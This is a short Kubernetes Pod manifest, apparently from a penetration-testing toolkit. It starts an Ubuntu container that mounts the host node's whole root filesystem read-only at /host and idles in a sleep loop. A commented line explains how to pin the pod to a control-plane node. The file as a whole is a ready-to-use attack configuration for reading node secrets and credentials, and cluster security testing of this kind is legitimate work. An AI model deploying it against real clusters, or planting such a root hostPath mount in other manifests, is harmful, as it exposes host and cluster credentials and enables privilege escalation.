apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exec-pod
  labels:
    app: pentest
spec:
  containers:
  - name: hostpath-exec-pod
    image: ubuntu
    resources:
      requests:
        cpu: 100m
        memory: 100Mi
      limits:
        cpu: 200m
        memory: 200Mi
    volumeMounts:
    - mountPath: /host
      readOnly: true
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name  
  volumes:
  - name: noderoot
    hostPath:
      path: /
